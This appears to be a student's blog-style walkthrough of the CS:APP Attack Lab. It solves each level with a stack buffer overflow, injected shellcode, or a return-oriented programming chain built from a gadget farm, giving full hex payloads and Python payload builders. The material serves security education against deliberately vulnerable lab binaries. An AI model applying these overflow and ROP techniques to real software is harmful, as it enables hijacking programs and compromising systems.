Detailed requirements and resources are available at http://csapp.cs.cmu.edu/3e/labs.html or http://www.cs.cmu.edu/~./213/schedule.html.
getbuf() is implemented as:
unsigned getbuf()
{
    char buf[BUFFER_SIZE];
    Gets(buf); /* no bounds checking */
    return 1;
}
BUFFER_SIZE is a constant fixed at compile time.
Part I: Code Injection Attacks
test() is the function that ctarget enters when it runs, and the one we will exploit:
void test()
{
    int val;
    val = getbuf();
    printf("No exploit.  Getbuf returned 0x%x\n", val);
}
Level 1
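This level asks us to overwrite the return address that test() pushes when it calls getbuf() with the address of touch1().
Set a breakpoint at test() in GDB and single-step into getbuf(). You can see that once Gets() reads more than 0x28 bytes, it overwrites the return address stored just above the buffer. Look up the address of touch1() (by disassembling ctarget or in the debugger):
00000000004017c0 <touch1>: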
4017c0: 48 83 ec 08 sub $0x8,%rsp
4017c4: c7 05 0e 2d 20 00 01 movl $0x1,0x202d0e(%rip) # 6044dc
4017cb: 00 00 00
4017ce: bf c5 30 40 00 mov $0x4030c5,%edi
4017d3: e8 e8 f4 ff ff callq 400cc0
4017d8: bf 01 00 00 00 mov $0x1,%edi
4017dd: e8 ab 04 00 00 callq 401c8d
4017e2: bf 00 00 00 00 mov $0x0,%edi
4017e7: e8 54 f6 ff ff callq 400e40
So the input is 0x28 bytes of padding followed by the return address 00000000004017c0 in little-endian byte order, i.e. exploit.txt should be:
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 17 40 00 00 00 00 00
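The byte string above can be generated rather than typed by hand. The following is a minimal Python sketch, not part of the lab materials: the helper names `le64`, `level1_payload` and `to_hex_text` are made up for this illustration, and the buffer size and address are the values from my target. The output is space-separated hex pairs, which I assume is the form you want to paste into exploit.txt.

```python
import struct

BUF_SIZE = 0x28      # bytes from the start of buf to the saved return address (my target)
TOUCH1 = 0x4017c0    # address of touch1() in my ctarget

def le64(value):
    """Pack a 64-bit value in little-endian byte order."""
    return struct.pack("<Q", value)

def level1_payload():
    """Padding up to the return address, then the address of touch1()."""
    return b"\x00" * BUF_SIZE + le64(TOUCH1)

def to_hex_text(data):
    """Format bytes as space-separated two-digit hex pairs."""
    return " ".join(f"{b:02x}" for b in data)

print(to_hex_text(level1_payload()))
```

The last eight bytes of the output are the little-endian form of the touch1() address, which is why they read c0 17 40 00 and not 00 40 17 c0.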
Run:
Level 2
This level asks us to make getbuf(), called from test(), return to touch2(), and to pass the value in cookie.txt as the argument of touch2(). In my environment the cookie is 0x59b997fa.
void touch2(unsigned val)
{
    vlevel = 2; /* Part of validation protocol */
    if (val == cookie) {
        printf("Touch2!: You called touch2(0x%.8x)\n", val);
        validate(2);
    } else {
        printf("Misfire: You called touch2(0x%.8x)\n", val);
        fail(2);
    }
    exit(0);
}
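From the previous level we know that once Gets() reads more than 0x28 bytes it overwrites the return address above the buffer. This time, though, touch2() must receive the cookie as its argument, so we have to change %rdi. According to the lab description, ctarget is built without address randomization and with an executable stack, so we can reach the goal by injecting code.
1. Find the address of touch2():
00000000004017ec <touch2>: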
4017ec: 48 83 ec 08 sub $0x8,%rsp
4017f0: 89 fa mov %edi,%edx
4017f2: c7 05 e0 2c 20 00 02 movl $0x2,0x202ce0(%rip) # 6044dc
4017f9: 00 00 00
4017fc: 3b 3d e2 2c 20 00 cmp 0x202ce2(%rip),%edi # 6044e4
401802: 75 20 jne 401824
.........
2. Write the assembly that loads the cookie into %rdi:
movq $0x59b997fa, %rdi # argument: the cookie
retq
3. Assemble the code:
gcc -c asm.s
4. Disassemble the resulting object file to get the machine code of the instructions:
frank@under:~/Desktop/cs:app/lab/AttackLab/target1$ objdump -d asm.o
asm.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <.text>:
0: 48 c7 c7 fa 97 b9 59 mov $0x59b997fa,%rdi
7: c3 retq
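5. I plan to inject the code into the 0x28-byte region occupied by buf[BUFFER_SIZE]. First we need the address of the top of the stack (the start of buf), so that getbuf() returns there and %rip moves from .text onto the stack. Inspecting the stack in GDB inside getbuf() gives 0x5561dc78, so the return address of getbuf() should be overwritten with 0x5561dc78.
6. So exploit.txt should be as follows. Note the little-endian byte order. The 8 bytes after the 0x28 bytes of padding and the 0x8-byte return address hold the address of touch2(), which is what the injected ret pops once %rdi has been set. Both the instructions and the data now live on the stack: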
48 c7 c7 fa 97 b9 59 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 dc 61 55 00 00 00 00 ec 17 40 00 00 00 00 00
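The layout from step 6 can be checked with a short script. This is only a sketch in Python: the constants are the values from my target, and the names `SHELLCODE`, `BUF_ADDR` and `level2_payload` are invented for the illustration.

```python
import struct

BUF_SIZE = 0x28
BUF_ADDR = 0x5561dc78    # start of buf on the stack (my target, from GDB)
TOUCH2 = 0x4017ec        # address of touch2() in my ctarget
# mov $0x59b997fa,%rdi ; retq  (bytes copied from the objdump output above)
SHELLCODE = bytes.fromhex("48 c7 c7 fa 97 b9 59 c3")

def level2_payload():
    """Injected code padded to the buffer size, then two 8-byte stack slots."""
    code = SHELLCODE.ljust(BUF_SIZE, b"\x00")
    return (code
            + struct.pack("<Q", BUF_ADDR)   # getbuf() returns into buf
            + struct.pack("<Q", TOUCH2))    # the injected retq pops this

print(level2_payload().hex(" "))
```

The order of the two trailing slots matters: the first is consumed by getbuf()'s own ret, the second by the retq inside the injected code.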
Run:
Level 3
This level is also a code injection, but we must pass the cookie to touch3() as a string.
/* Compare string to hex representation of unsigned value */
int hexmatch(unsigned val, char *sval)
{
    char cbuf[110];
    /* Make position of check string unpredictable */
    char *s = cbuf + random() % 100;
    sprintf(s, "%.8x", val);
    return strncmp(sval, s, 9) == 0;
}
void touch3(char *sval)
{
    vlevel = 3; /* Part of validation protocol */
    if (hexmatch(cookie, sval)) {
        printf("Touch3!: You called touch3(\"%s\")\n", sval);
        validate(3);
    } else {
        printf("Misfire: You called touch3(\"%s\")\n", sval);
        fail(3);
    }
    exit(0);
}
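1. A string is stored byte by byte in increasing address order. From the ASCII table, my cookie 0x59b997fa becomes the following (do not forget the terminating 0x00):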
35 39 62 39 39 37 66 61 00
2. Find the address of touch3():
00000000004018fa <touch3>:
4018fa: 53 push %rbx
4018fb: 48 89 fb mov %rdi,%rbx
4018fe: c7 05 d4 2b 20 00 03 movl $0x3,0x202bd4(%rip) # 6044dc
401905: 00 00 00
401908: 48 89 fe mov %rdi,%rsi
40190b: 8b 3d d3 2b 20 00 mov 0x202bd3(%rip),%edi # 6044e4
401911: e8 36 ff ff ff callq 40184c
401916: 85 c0 test %eax,%eax
401918: 74 23 je 40193d
.........
3. Write the assembly:
movq $0x5561dcb0, %rdi # argument: address of the cookie string
retq
4. Assemble and disassemble:
frank@under:~/Documents/study/cs:app/lab/AttackLab/target1$ objdump -d asm.o
asm.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <.text>:
0: 48 c7 c7 b0 dc 61 55 mov $0x5561dcb0,%rdi
7: c3 retq
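5. Note that hexmatch() and touch3() both put data on the stack when they run. hexmatch() in particular has a local array, which is certainly stored in its stack frame, that is, at addresses below %rsp, so anything we leave in that region can be overwritten. The string from step 1 therefore has to be placed at a higher address than %rsp. From Level 2, that address is 0x5561dc78+0x28+0x8+0x8 = 0x5561dcb0 (start of buf, plus the buffer, plus the return-address slot, plus the slot holding the touch3() address). So exploit.txt should be: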
48 c7 c7 b0 dc 61 55 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 dc 61 55 00 00 00 00 fa 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61 00
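Steps 1 to 5 can be reproduced in a few lines. The sketch below is Python written for this post, not something from the lab: the function names are hypothetical, and the addresses are the ones from my target. It derives the cookie string, the address where the string lands, and the final payload.

```python
import struct

BUF_ADDR = 0x5561dc78    # start of buf, found in Level 2 (my target)
BUF_SIZE = 0x28
TOUCH3 = 0x4018fa        # address of touch3() in my ctarget
COOKIE = 0x59b997fa

def cookie_string(cookie):
    """ASCII hex digits of the cookie (like "%.8x") plus the terminating NUL."""
    return f"{cookie:08x}".encode("ascii") + b"\x00"

def string_address():
    """buf + buffer size + return-address slot + touch3 slot."""
    return BUF_ADDR + BUF_SIZE + 8 + 8

def level3_payload():
    # mov $imm32,%rdi ; retq  ->  48 c7 c7 <imm32, little-endian> c3
    code = b"\x48\xc7\xc7" + struct.pack("<I", string_address()) + b"\xc3"
    return (code.ljust(BUF_SIZE, b"\x00")
            + struct.pack("<Q", BUF_ADDR)
            + struct.pack("<Q", TOUCH3)
            + cookie_string(COOKIE))

print(hex(string_address()))
print(cookie_string(COOKIE).hex(" "))
print(level3_payload().hex(" "))
```

Placing the string after the touch3() slot keeps it above %rsp for the whole run of touch3() and hexmatch(), so their pushes and locals cannot overwrite it.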
Run:
Part II: Return-Oriented Programming
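The last two levels enable address randomization and a non-executable stack, so they require a ROP attack.
Disassembling rtarget gives the region of reusable code (the gadget farm):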
0000000000401994 :
401994: b8 01 00 00 00 mov $0x1,%eax
401999: c3 retq
000000000040199a :
40199a: b8 fb 78 90 90 mov $0x909078fb,%eax
40199f: c3 retq
00000000004019a0 :
4019a0: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
4019a6: c3 retq
00000000004019a7 :
4019a7: 8d 87 51 73 58 90 lea -0x6fa78caf(%rdi),%eax
4019ad: c3 retq
00000000004019ae :
4019ae: c7 07 48 89 c7 c7 movl $0xc7c78948,(%rdi)
4019b4: c3 retq
00000000004019b5 :
4019b5: c7 07 54 c2 58 92 movl $0x9258c254,(%rdi)
4019bb: c3 retq
00000000004019bc :
4019bc: c7 07 63 48 8d c7 movl $0xc78d4863,(%rdi)
4019c2: c3 retq
00000000004019c3 :
4019c3: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi)
4019c9: c3 retq
00000000004019ca :
4019ca: b8 29 58 90 c3 mov $0xc3905829,%eax
4019cf: c3 retq
00000000004019d0 :
4019d0: b8 01 00 00 00 mov $0x1,%eax
4019d5: c3 retq
00000000004019d6 :
4019d6: 48 8d 04 37 lea (%rdi,%rsi,1),%rax
4019da: c3 retq
00000000004019db :
4019db: b8 5c 89 c2 90 mov $0x90c2895c,%eax
4019e0: c3 retq
00000000004019e1 :
4019e1: c7 07 99 d1 90 90 movl $0x9090d199,(%rdi)
4019e7: c3 retq
00000000004019e8 :
4019e8: 8d 87 89 ce 78 c9 lea -0x36873177(%rdi),%eax
4019ee: c3 retq
00000000004019ef :
4019ef: 8d 87 8d d1 20 db lea -0x24df2e73(%rdi),%eax
4019f5: c3 retq
00000000004019f6 :
4019f6: b8 89 d1 48 c0 mov $0xc048d189,%eax
4019fb: c3 retq
00000000004019fc :
4019fc: c7 07 81 d1 84 c0 movl $0xc084d181,(%rdi)
401a02: c3 retq
0000000000401a03 :
401a03: 8d 87 41 48 89 e0 lea -0x1f76b7bf(%rdi),%eax
401a09: c3 retq
0000000000401a0a :
401a0a: c7 07 88 c2 08 c9 movl $0xc908c288,(%rdi)
401a10: c3 retq
0000000000401a11 :
401a11: 8d 87 89 ce 90 90 lea -0x6f6f3177(%rdi),%eax
401a17: c3 retq
0000000000401a18 :
401a18: b8 48 89 e0 c1 mov $0xc1e08948,%eax
401a1d: c3 retq
0000000000401a1e :
401a1e: 8d 87 89 c2 00 c9 lea -0x36ff3d77(%rdi),%eax
401a24: c3 retq
0000000000401a25 :
401a25: 8d 87 89 ce 38 c0 lea -0x3fc73177(%rdi),%eax
401a2b: c3 retq
0000000000401a2c :
401a2c: c7 07 81 ce 08 db movl $0xdb08ce81,(%rdi)
401a32: c3 retq
0000000000401a33 :
401a33: b8 89 d1 38 c9 mov $0xc938d189,%eax
401a38: c3 retq
0000000000401a39 :
401a39: 8d 87 c8 89 e0 c3 lea -0x3c1f7638(%rdi),%eax
401a3f: c3 retq
0000000000401a40 :
401a40: 8d 87 89 c2 84 c0 lea -0x3f7b3d77(%rdi),%eax
401a46: c3 retq
0000000000401a47 :
401a47: 8d 87 48 89 e0 c7 lea -0x381f76b8(%rdi),%eax
401a4d: c3 retq
0000000000401a4e :
401a4e: b8 99 d1 08 d2 mov $0xd208d199,%eax
401a53: c3 retq
0000000000401a54 :
401a54: b8 89 c2 c4 c9 mov $0xc9c4c289,%eax
401a59: c3 retq
0000000000401a5a :
401a5a: c7 07 48 89 e0 91 movl $0x91e08948,(%rdi)
401a60: c3 retq
0000000000401a61 :
401a61: 8d 87 89 ce 92 c3 lea -0x3c6d3177(%rdi),%eax
401a67: c3 retq
0000000000401a68 :
401a68: b8 89 d1 08 db mov $0xdb08d189,%eax
401a6d: c3 retq
0000000000401a6e :
401a6e: c7 07 89 d1 91 c3 movl $0xc391d189,(%rdi)
401a74: c3 retq
0000000000401a75 :
401a75: c7 07 81 c2 38 d2 movl $0xd238c281,(%rdi)
401a7b: c3 retq
0000000000401a7c :
401a7c: c7 07 09 ce 08 c9 movl $0xc908ce09,(%rdi)
401a82: c3 retq
0000000000401a83 :
401a83: 8d 87 08 89 e0 90 lea -0x6f1f76f8(%rdi),%eax
401a89: c3 retq
0000000000401a8a :
401a8a: 8d 87 89 c2 c7 3c lea 0x3cc7c289(%rdi),%eax
401a90: c3 retq
0000000000401a91 :
401a91: b8 88 ce 20 c0 mov $0xc020ce88,%eax
401a96: c3 retq
0000000000401a97 :
401a97: c7 07 48 89 e0 c2 movl $0xc2e08948,(%rdi)
401a9d: c3 retq
0000000000401a9e :
401a9e: 8d 87 89 c2 60 d2 lea -0x2d9f3d77(%rdi),%eax
401aa4: c3 retq
0000000000401aa5 :
401aa5: b8 8d ce 20 d2 mov $0xd220ce8d,%eax
401aaa: c3 retq
0000000000401aab :
401aab: c7 07 48 89 e0 90 movl $0x90e08948,(%rdi)
401ab1: c3 retq
0000000000401ab2 :
401ab2: b8 01 00 00 00 mov $0x1,%eax
401ab7: c3 retq
401ab8: 90 nop
401ab9: 90 nop
401aba: 90 nop
401abb: 90 nop
401abc: 90 nop
401abd: 90 nop
401abe: 90 nop
401abf: 90 nop
For reference, the instruction encodings are listed below in hexadecimal:
A. Encodings of movq instructions
B. Encodings of popq instructions
C. Encodings of movl instructions
D. Encodings of 2-byte functional nop instructions
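The encodings used in the rest of this part follow a regular pattern and can be recomputed when needed. The sketch below is my own Python illustration based on the standard x86-64 register numbering; the function names are made up, and it only covers the register-to-register forms that appear in this lab.

```python
# Register numbers shared by the 64-bit, 32-bit and (for the first four) 8-bit names
REG_NUMBER = {}
for n, base in enumerate(["ax", "cx", "dx", "bx", "sp", "bp", "si", "di"]):
    REG_NUMBER["r" + base] = n
    REG_NUMBER["e" + base] = n
for n, name in enumerate(["al", "cl", "dl", "bl"]):
    REG_NUMBER[name] = n

def modrm(src, dst):
    """Register-to-register ModRM byte: binary 11, then src, then dst."""
    return 0xC0 | (REG_NUMBER[src] << 3) | REG_NUMBER[dst]

def movq(src, dst):
    return bytes([0x48, 0x89, modrm(src, dst)])   # REX.W prefix + mov

def movl(src, dst):
    return bytes([0x89, modrm(src, dst)])

def popq(dst):
    return bytes([0x58 + REG_NUMBER[dst]])

# 2-byte functional nops: opcode, then a ModRM byte with src == dst
NOP_OPCODE = {"andb": 0x20, "orb": 0x08, "cmpb": 0x38, "testb": 0x84}

def functional_nop(op, reg):
    return bytes([NOP_OPCODE[op], modrm(reg, reg)])

print(movq("rax", "rdi").hex(" "))           # bytes to search for in the farm
print(popq("rax").hex(" "))
print(functional_nop("cmpb", "al").hex(" "))
```

Searching the farm then comes down to looking for these byte sequences followed by c3, with only nops or functional nops in between.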
Level 2
This level asks us to repeat the Level 2 attack from Part I, using only the first eight x86-64 registers (%rax–%rdi) and the following instructions:
movq : The codes for these are shown in Figure A.
popq : The codes for these are shown in Figure B.
ret : This instruction is encoded by the single byte 0xc3.
nop : This instruction (pronounced “no op,” which is short for “no operation”) is encoded by the single byte 0x90. Its only effect is to cause the program counter to be incremented by 1.
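1. Look for usable instructions. My first idea was to find pop %rdi and then return to touch2(), but the gadget farm does not contain the corresponding byte 5f. So I decided to pop into another register first and then use movq. Since %rax shows up a lot, I looked for pop %rax and movq %rax, %rdi.
I found the following two usable gadgets: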
00000000004019a7 <addval_219>:
4019a7: 8d 87 51 73 58 90 lea -0x6fa78caf(%rdi),%eax
4019ad: c3 retq
00000000004019c3 <setval_426>:
4019c3: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi)
4019c9: c3 retq
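In addval_219, the byte 58 we want is at 0x4019a7 + 4 = 0x4019ab.
In setval_426, the bytes we want start at 0x4019c3 + 2 = 0x4019c5.
So our gadgets are 0x4019ab and 0x4019c5.
2. Find the address of touch2() (the function lives in the .text segment, so stack address randomization does not affect it):
00000000004017ec <touch2>: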
4017ec: 48 83 ec 08 sub $0x8,%rsp
4017f0: 89 fa mov %edi,%edx
4017f2: c7 05 e0 3c 20 00 02 movl $0x2,0x203ce0(%rip) # 6054dc
4017f9: 00 00 00
4017fc: 3b 3d e2 3c 20 00 cmp 0x203ce2(%rip),%edi # 6054e4
401802: 75 20 jne 401824
401804: be 08 32 40 00 mov $0x403208,%esi
401809: bf 01 00 00 00 mov $0x1,%edi
40180e: b8 00 00 00 00 mov $0x0,%eax
................
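3. Check the size of the stack frame: it has not changed and is still 0x28 bytes.
4. So the input is 0x28 bytes of padding + the address of the first gadget, 0x4019ab + the cookie 0x59b997fa (popped into %rax) + the address of the second gadget, 0x4019c5 + the address of touch2(), i.e. exploit.txt should be: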
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ab 19 40 00 00 00 00 00 fa 97 b9 59 00 00 00 00 c5 19 40 00 00 00 00 00 ec 17 40 00 00 00 00 00
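The gadget addresses and the chain above can be derived mechanically. Here is a small Python sketch under my own assumptions: `find_gadget` and `rop_level2_payload` are hypothetical helpers, the function bytes are copied from my rtarget disassembly, and the search only accepts a match when nothing but 0x90 nops sit between it and the c3.

```python
import struct

# (start address, bytes including the final c3) of two farm functions in my rtarget
ADDVAL_219 = (0x4019a7, bytes.fromhex("8d 87 51 73 58 90 c3"))
SETVAL_426 = (0x4019c3, bytes.fromhex("c7 07 48 89 c7 90 c3"))
TOUCH2 = 0x4017ec
COOKIE = 0x59b997fa

def find_gadget(func, pattern):
    """Address where pattern starts, if only nops separate it from a ret."""
    base, code = func
    pos = code.find(pattern)
    while pos != -1:
        rest = code[pos + len(pattern):].lstrip(b"\x90")
        if rest.startswith(b"\xc3"):
            return base + pos
        pos = code.find(pattern, pos + 1)
    return None

def rop_level2_payload():
    pop_rax = find_gadget(ADDVAL_219, b"\x58")              # popq %rax
    mov_rax_rdi = find_gadget(SETVAL_426, b"\x48\x89\xc7")  # movq %rax, %rdi
    slots = [pop_rax, COOKIE, mov_rax_rdi, TOUCH2]
    return b"\x00" * 0x28 + b"".join(struct.pack("<Q", s) for s in slots)

print(rop_level2_payload().hex(" "))
```

Every slot is 8 bytes wide, including the cookie: popq %rax takes a full 64-bit value off the stack, so the cookie has to be padded with four zero bytes.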
Run:
Level 3
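This level may take a lot of time, so I will write it up later. First I need to go review mathematical logic.
Update:
This level took about an hour. The main obstacle was a hint in the handout: You’ll want to review the effect a movl instruction has on the upper 4 bytes of a register, as is described on page 183 of the text.
For a long time I could not see how movq, movl, popq and functional nops alone could get the address of the string into %rdi. If we rely only on the last gadget to capture the address of the string (stored just above the last gadget), there is no instruction that moves %rsp directly into %rdi, and there would be no slot left for calling touch3(), because the last gadget and the string would be adjacent. So that idea does not work, and we have to use a relative address instead: first read %rsp (which at that moment does not yet point at the string) to capture the randomized high part of the address, then add an offset to it to get the address of the string we placed.
But there is one more problem: the handout gives no reference encoding for addq. With the listed instructions alone, we could only change the low bits with movl, and that would clear the high bits (for example 7fff..).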
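The effect the hint refers to is easy to model. The following Python sketch is only an illustration of the register semantics, with a made-up stack address: movl copies the low 32 bits and zeroes the upper 32 bits of the destination, so a full stack address does not survive it, while a small offset does.

```python
MASK64 = (1 << 64) - 1
MASK32 = (1 << 32) - 1

def after_movq(src_value):
    """Value of the destination register after movq: all 64 bits copied."""
    return src_value & MASK64

def after_movl(src_value):
    """Value of the destination register after movl: low 32 bits kept, high 32 bits zeroed."""
    return src_value & MASK32

stack_addr = 0x7ffffffde8a0   # hypothetical randomized stack address
offset = 0x48                 # a small offset fits in 32 bits

print(hex(after_movq(stack_addr)))
print(hex(after_movl(stack_addr)))
print(hex(after_movl(offset)))
```

This is why the address has to travel through movq gadgets only, while the offset can safely be passed along with movl.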
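I was stuck here for a while, then wondered whether the farm itself contained something usable. Searching turned up one gadget that stands out from the rest: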
00000000004019d6 :
4019d6: 48 8d 04 37 lea (%rdi,%rsi,1),%rax
4019da: c3 retq
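So the plan is: keep the old address in %rdi and the offset in %rsi. After this gadget runs, %rax holds the real address of the string. Then move %rax, directly or indirectly, into %rdi and return to touch3(). The steps are:
1. %rsp certainly has to be read out, so first look in the gadgets for a movq with %rsp as the source.
There is no direct movq %rsp, %rdi, but there is one that moves it into %rax:
movq %rsp, %rax # machine code: 48 89 e0
0000000000401aab : # usable address: 401aad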
401aab: c7 07 48 89 e0 90 movl $0x90e08948,(%rdi)
401ab1: c3 retq
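2. Next look for movq %rax, %rdi, which combines with the movq %rsp, %rax above to pass the old address along indirectly.
Two candidates contain it:
movq %rax, %rdi # machine code: 48 89 c7
00000000004019a0 : # usable address: 4019a2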
4019a0: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
4019a6: c3 retq
00000000004019c3 :
4019c3: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi)
4019c9: c3 retq
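3. Look for a popq that pops the offset directly into %rsi: there is none. Then look for a movq into %rsi, to do one indirect move: none either. Then it occurred to me that we only need the low bits of the offset (the string sits at a higher address, so the offset is a small positive number), so a movl into %esi works just as well.
This turned up four gadgets containing movl %ecx, %esi. A candidate is usable only if nothing but nops or functional nops lies between the instruction and the c3, so check the trailing bytes of each one; the gadget at 401a13 meets that condition and is the one I use. Functional nops in that position do not affect what the gadget does.
movl %ecx, %esi # machine code: 89 ce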
00000000004019e8 :
4019e8: 8d 87 89 ce 78 c9 lea -0x36873177(%rdi),%eax
4019ee: c3 retq
0000000000401a11 : # usable address: 401a13
401a11: 8d 87 89 ce 90 90 lea -0x6f6f3177(%rdi),%eax
401a17: c3 retq
0000000000401a25 :
401a25: 8d 87 89 ce 38 c0 lea -0x3fc73177(%rdi),%eax
401a2b: c3 retq
0000000000401a61 :
401a61: 8d 87 89 ce 92 c3 lea -0x3c6d3177(%rdi),%eax
401a67: c3 retq
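4. Next, look for a popq %rcx gadget: there is none, so another indirect move is needed. Look for a movl into %ecx. (From here on, for indirect moves I search for movl directly: its encoding is shorter than movq's, so it is more likely to appear.)
Two usable gadgets turn up, both movl %edx, %ecx:
movl %edx, %ecx # machine code: 89 d1
0000000000401a33 : # usable address: 401a34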
401a33: b8 89 d1 38 c9 mov $0xc938d189,%eax
401a38: c3 retq
0000000000401a68 :
401a68: b8 89 d1 08 db mov $0xdb08d189,%eax
401a6d: c3 retq
5. Next, look for a popq %rdx gadget: still none, so yet another indirect move is needed. Look for a movl into %edx.
Two usable gadgets turn up, both movl %eax, %edx:
movl %eax, %edx # machine code: 89 c2
00000000004019db : # usable address: 4019dd
4019db: b8 5c 89 c2 90 mov $0x90c2895c,%eax
4019e0: c3 retq
0000000000401a40 :
401a40: 8d 87 89 c2 84 c0 lea -0x3f7b3d77(%rdi),%eax
401a46: c3 retq
6. Next, look for a popq %rax gadget. This time there finally is one.
popq %rax # machine code: 58
00000000004019a7 : # usable address: 4019ab
4019a7: 8d 87 51 73 58 90 lea -0x6fa78caf(%rdi),%eax
4019ad: c3 retq
00000000004019ca :
4019ca: b8 29 58 90 c3 mov $0xc3905829,%eax
4019cf: c3 retq
7. Find the address of touch3(): 00000000004018fa
00000000004018fa <touch3>:
4018fa: 53 push %rbx
4018fb: 48 89 fb mov %rdi,%rbx
4018fe: c7 05 d4 3b 20 00 03 movl $0x3,0x203bd4(%rip) # 6054dc
401905: 00 00 00
401908: 48 89 fe mov %rdi,%rsi
40190b: 8b 3d d3 3b 20 00 mov 0x203bd3(%rip),%edi # 6054e4
401911: e8 36 ff ff ff callq 40184c
401916: 85 c0 test %eax,%eax
401918: 74 23 je 40193d
40191a: 48 89 da mov %rbx,%rdx
40191d: be 58 32 40 00 mov $0x403258,%esi
...............
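First, let's lay out the input strategy:
0x28 bytes of padding -> movq %rsp, %rax (old address) -> movq %rax, %rdi -> popq %rax (offset) -> offset (the data that the previous gadget pops into %rax) -> movl %eax, %edx -> movl %edx, %ecx -> movl %ecx, %esi -> lea (%rdi,%rsi,1),%rax -> movq %rax, %rdi -> address of touch3 -> cookie string
That is 8 gadgets in total, the same number of steps as the “official” solution mentioned in the handout. I wonder what the minimum is.
Let's build the input first and work out the value of offset afterwards:
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 /* 0x28 bytes of padding */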
ad 1a 40 00 00 00 00 00 /* movq %rsp, %rax */
a2 19 40 00 00 00 00 00 /* movq %rax, %rdi */
ab 19 40 00 00 00 00 00 /* popq %rax */
xx xx 00 00 00 00 00 00 /* offset*/
dd 19 40 00 00 00 00 00 /* movl %eax, %edx */
34 1a 40 00 00 00 00 00 /* movl %edx, %ecx */
13 1a 40 00 00 00 00 00 /* movl %ecx, %esi */
d6 19 40 00 00 00 00 00 /* lea (%rdi,%rsi,1),%rax */
a2 19 40 00 00 00 00 00 /* movq %rax, %rdi */
fa 18 40 00 00 00 00 00 /* touch3 */
35 39 62 39 39 37 66 61 00 /* string */
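Now compute the offset. Note that retq is effectively popq %rip, so by the time the first gadget's movq %rsp, %rax executes, %rsp already points at the slot of the next gadget, movq %rax, %rdi. I got this wrong at first and added 8 bytes too many. The string starts 9 slots above that point (the offset slot itself counts as one of them), so the offset is 9*8 = 72 = 0x48.
So exploit.txt should be: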
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ad 1a 40 00 00 00 00 00 a2 19 40 00 00 00 00 00 ab 19 40 00 00 00 00 00 48 00 00 00 00 00 00 00 dd 19 40 00 00 00 00 00 34 1a 40 00 00 00 00 00 13 1a 40 00 00 00 00 00 d6 19 40 00 00 00 00 00 a2 19 40 00 00 00 00 00 fa 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61 00
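The offset does not have to be counted by hand. The sketch below is a Python illustration I wrote for this post, with hypothetical names (`CHAIN`, `string_offset`, `build`) and the gadget addresses from my rtarget: it computes the offset from the chain itself and assembles the payload.

```python
import struct

PAD = 0x28
COOKIE_STRING = b"59b997fa\x00"

# One entry per 8-byte stack slot; None marks the slot that holds the offset
CHAIN = [
    ("movq %rsp, %rax", 0x401aad),
    ("movq %rax, %rdi", 0x4019a2),
    ("popq %rax", 0x4019ab),
    ("offset", None),
    ("movl %eax, %edx", 0x4019dd),
    ("movl %edx, %ecx", 0x401a34),
    ("movl %ecx, %esi", 0x401a13),
    ("lea (%rdi,%rsi,1),%rax", 0x4019d6),
    ("movq %rax, %rdi", 0x4019a2),
    ("touch3", 0x4018fa),
]

def string_offset(chain):
    """Distance from the value captured by movq %rsp, %rax to the string."""
    # The ret that enters the first gadget has already popped slot 0,
    # so %rsp points at slot 1; the string starts right after the last slot.
    return 8 * (len(chain) - 1)

def build(chain):
    offset = string_offset(chain)
    slots = [offset if addr is None else addr for _, addr in chain]
    return b"\x00" * PAD + b"".join(struct.pack("<Q", s) for s in slots) + COOKIE_STRING

print(hex(string_offset(CHAIN)))
print(build(CHAIN).hex(" "))
```

Deriving the offset from the chain length means it stays correct if a gadget is later added or removed.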
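Run:
This lab was really fun. If the previous bomblab was reverse engineering, then this one is pwn, haha.
One more thing: two of the functional nops deserve a note.
and and or normally modify the destination operand, but here the source and destination are the same register, so the result equals the original value and the operand is left unchanged.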
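Both points can be checked in code. The Python sketch below is my own illustration, not something from the handout: it confirms that x & x and x | x leave every byte value unchanged, and it tests whether the bytes that follow a gadget's useful instruction are only nops or 2-byte functional nops before the c3. The helper name `tail_is_harmless` is made up, and the example tails are the bytes that follow 89 ce in the four farm functions listed earlier.

```python
# First byte of the 2-byte functional nops: andb, orb, cmpb, testb
NOP_OPCODES = {0x20, 0x08, 0x38, 0x84}
# Second byte: ModRM with the same source and destination (%al, %cl, %dl, %bl)
SAME_REG = {0xC0, 0xC9, 0xD2, 0xDB}

def tail_is_harmless(tail):
    """True if tail is a run of nops / functional nops that ends in ret (c3)."""
    i = 0
    while i < len(tail):
        if tail[i] == 0xC3:
            return True
        if tail[i] == 0x90:
            i += 1
        elif tail[i] in NOP_OPCODES and i + 1 < len(tail) and tail[i + 1] in SAME_REG:
            i += 2
        else:
            return False
    return False

# and/or with identical operands never change the value
unchanged = all((x & x) == x and (x | x) == x for x in range(256))
print(unchanged)

# Bytes following "89 ce" in the functions at 4019e8, 401a11, 401a25, 401a61
for tail in ["78 c9 c3", "90 90 c3", "38 c0 c3", "92 c3"]:
    print(tail, tail_is_harmless(bytes.fromhex(tail)))
```

Under this check only the tails made of 90 or of an opcode pair such as 38 c0 pass; a tail that starts with any other byte would execute a real instruction before reaching ret.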